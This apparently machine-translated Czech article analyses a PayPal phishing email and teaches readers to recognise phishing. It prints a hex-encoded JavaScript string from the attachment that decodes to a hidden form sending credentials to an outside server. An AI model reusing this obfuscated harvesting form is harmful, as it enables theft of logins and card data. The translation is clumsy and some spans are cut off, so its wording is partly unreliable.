Domovská » jak » Online zabezpečení Zlomit anatomii phishingového e-mailu

    Online zabezpečení Zlomit anatomii phishingového e-mailu


    V dnešním světě, kde jsou všechny informace online, je phishing jedním z nejpopulárnějších a ničivějších online útoků, protože vždy můžete vyčistit virus, ale pokud jsou vaše bankovní údaje ukradeny, máte potíže. Zde je rozbor jednoho takového útoku, který jsme obdrželi.

    Nemyslete si, že jsou to jen vaše bankovní údaje, které jsou důležité: Koneckonců, pokud někdo získá kontrolu nad přihlášením k účtu, neví jen informace obsažené v tomto účtu, ale pravděpodobnost, že stejné přihlašovací údaje mohou být použity na různých dalších účty. A pokud kompromitují váš e-mailový účet, mohou resetovat všechna vaše další hesla.

    Takže kromě zachování silných a různorodých hesel, musíte vždy hledat falešné e-maily, které se skládají za skutečnou věc. Zatímco většina pokusů o phishing je amatérská, některé jsou docela přesvědčivé, takže je důležité pochopit, jak je rozpoznat na povrchové úrovni, a jak pracují pod kapotou.

    Obrázek by asirap

    Zkoumání toho, co je v zorném poli

    Náš příklad e-mailu, stejně jako většina pokusů o phishing, vás "upozorňuje" na aktivitu vašeho účtu PayPal, který by za normálních okolností byl alarmující. Takže výzva k akci je ověřit / obnovit účet tím, že odešlete jen o každém osobním informacím, o kterých si myslíte. Opět je to velmi formální.

    Zatímco tam jsou jistě výjimky, téměř všechny phishing a podvod e-mail je načten červené vlajky přímo ve zprávě sami. Dokonce i když je text přesvědčivý, můžete většinou nalézt mnoho chyb pokrytých celým tělem zprávy, které naznačují, že zpráva není legitimní.

    Tělo zprávy

    Na první pohled je to jeden z lepších e-mailů s phishingem, které jsem viděl. Neexistují žádné pravopisné nebo gramatické chyby a verbiage čte podle toho, co byste čekali. Existuje však několik červených vlajek, které můžete vidět při podrobnějším přezkoumání obsahu.

    • "Paypal" - Správný případ je "PayPal" (kapitál P). Ve zprávě můžete vidět oba varianty. Společnosti jsou velmi záměrné se svou značkou, takže je pochybné, že by něco takového prošlo procesem kontroly.
    • "Povolit ActiveX" - kolikrát jste viděli legit webovou firmu velikosti Paypal používat proprietární součást, která funguje pouze na jediném prohlížeči, zejména když podporují více prohlížečů? Jistě, někde venku to dělá nějaká společnost, ale je to červená vlajka.
    • "Bezpečně." - Všimněte si, jak se toto slovo na okraji nezobrazuje se zbytkem textu odstavce. Dokonce i když jsem okénko trochu více, to není zabalit nebo prostor správně.
    • "Paypal!" - Místo před vykřičníkem vypadá nepříjemně. Jediný další problém, který jsem si jistý, že nebude v legitímném e-mailu.
    • "PayPal - Formulář pro aktualizaci účtu.pdf.htm" - Proč by Paypal připojil "PDF", zejména pokud by mohl odkazovat pouze na stránku na svých stránkách? Navíc proč by se pokoušeli zakrýt HTML soubor jako PDF? To je největší červená vlajka všech.

    Záhlaví zprávy

    Když se podíváte na hlavičku zprávy, objeví se pár červených vlajek:

    • Adresa je [email protected].
    • Chybějící adresa chybí. Nevyprávěl jsem to, prostě není součástí standardního záhlaví zprávy. Typicky společnost, která má vaše jméno, vám přizpůsobí e-mail.

    Příloha

    Když otevře přílohu, můžete okamžitě vidět, že rozložení není správné, protože chybí informace o stylu. Opět platí, proč by PayPal poslal e-mailem formulář HTML, kdyby mohli jednoduše dát odkaz na své stránky?

    Poznámka: v tomto případě jsme použili integrovaný prohlížeč HTML pro prohlížeč Gmail, ale doporučujeme, abyste nepovolali přílohy od podvodníků. Nikdy. Vůbec. Velmi často obsahují exploity, které na vašem PC nainstalují trojské koně a ukradnou informace o vašem účtu.

    Při posunu dolů o něco víc vidíte, že se tento formulář dotazuje nejen na naše přihlašovací údaje PayPal, ale i na bankovní a kreditní karty. Některé snímky jsou přerušeny.

    Je zřejmé, že tento pokus o phishing jde po všem s jedním zákrokem.

    Technická porucha

    Zatímco by to mělo být docela jasné na základě toho, co je zřejmé, že jde o pokus o phishing, nyní rozložíme technickou strukturu e-mailu a uvidíme, co můžeme najít.

    Informace z přílohy

    První věc, na kterou se podíváte, je zdroj HTML formu přílohy, který předává data falešnému webu.

    Při rychlém prohlížení zdroje se všechny odkazy objeví jako platné, neboť odkazují buď na "paypal.com" nebo "paypalobjects.com", které jsou legitímné.

    Nyní se podíváme na některé základní informace, které Firefox shromažďuje na stránce.

    Jak můžete vidět, některé grafiky jsou vytaženy z domén "blessedtobe.com", "goodhealthpharmacy.com" a "pic-upload.de" namísto legitních domén PayPal.

    Informace z hlaviček e-mailu

    Dále se podíváme na hrubé hlavičky e-mailových zpráv. Služba Gmail je k dispozici prostřednictvím možnosti nabídky Zobrazit originál ve zprávě.

    Když se podíváte na informace o hlavičce původní zprávy, můžete vidět, že tato zpráva byla složena pomocí aplikace Outlook Express 6. Pochybuji, že PayPal má někoho v personálu, který posílá každou z těchto zpráv ručně prostřednictvím zastaralého e-mailového klienta.

    Nyní, když se podíváme na informace o směrování, můžeme vidět adresu IP odesílatele i vysílacího poštovního serveru.

    IP adresa "User" je původní odesílatel. Při rychlém vyhledávání informací o IP se můžeme přesvědčit, že vysílací IP je v Německu.

    A když se podíváme na adresu odesílajícího poštovního serveru (mail.itak.at), IP adresu, můžeme vidět, že se jedná o ISP se sídlem v Rakousku. Pochybuji, že služba PayPal směruje své e-maily přímo prostřednictvím poskytovatele ISP v Rakousku, když mají masivní serverovou farmu, která by mohla tuto úlohu snadno zvládnout.

    Kde jde data??

    Takže jsme jasně zjistili, že jde o phishingový e-mail a shromáždili nějaké informace o tom, odkud pocházejí zprávy, ale co je s tím, kde jsou vaše data odeslána?

    Chcete-li to vidět, musíme nejprve uložit přílohu HTM do pracovní plochy a otevřít ji v textovém editoru. Při procházení se zdá, že vše je v pořádku, s výjimkou případů, kdy se dostaneme k podezřelému bloku Javascript.

    Při vypnutí úplného zdroje posledního bloku javascriptu vidíme:


    // Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
    var i, y, x =“3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e“; y =“; pro (i = 0; i

    Kdykoli vidíte rozsáhlý řetězec zdánlivě náhodných písmen a čísel vložených do bloku Javascript, je to obvykle něco podezřelého. Když se podíváme na kód, proměnná "x" se nastaví na tento velký řetězec a pak se dekóduje do proměnné "y". Konečný výsledek proměnné "y" je pak zapsán do dokumentu jako HTML.

    Vzhledem k tomu, že velký řetězec je tvořen čísly 0-9 a písmeny a-f, je s největší pravděpodobností zakódován pomocí jednoduché konverze ASCII na Hex:

    3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

    Převede na:

    Není náhoda, že to dekóduje do platného tagu formátu HTML, který výsledky odesílá do PayPal, ale do nepoctivé stránky.

    Navíc při zobrazení zdroje HTML formuláře zjistíte, že tento formulář není viditelný, protože je generován dynamicky pomocí javascriptu. Je to chytrý způsob, jak skrýt to, co HTML skutečně dělá, pokud by někdo prostě prohlížel generovaný zdroj přílohy (jak jsme to dělali dříve), na rozdíl od otevření přílohy přímo v textovém editoru.

    Při běhu rychlého whois na útočné stránce, můžeme vidět, že je to doména hostovaná na populárním web hostu, 1and1.

    Co vyniká, doména používá čitelné jméno (na rozdíl od něčeho jako "dfh3sjhskjhw.net") a doména byla registrována po dobu 4 let. Z tohoto důvodu jsem přesvědčen, že tato doména byla v tomto phishingovém pokusu unesena a použita jako pěšec.

    Cynismus je dobrá obrana

    Pokud jde o to, že zůstaneme v bezpečí on-line, nikdy to neublíží, že bude mít dobrý cynismus.

    Zatímco jsem si jist, že v příkladovém e-mailu jsou červené vlaječky, je to, co jsme uvedli výše, ukazatele, které jsme viděli po několika minutách zkoumání. Hypoteticky, pokud by úroveň povrchu e-mailu napodobovala jeho legitimní protiklad 100%, technická analýza by stále odhalila jeho pravou povahu. To je důvod, proč je důležité, abyste mohli zkoumat jak to, co můžete a jak nevidíte.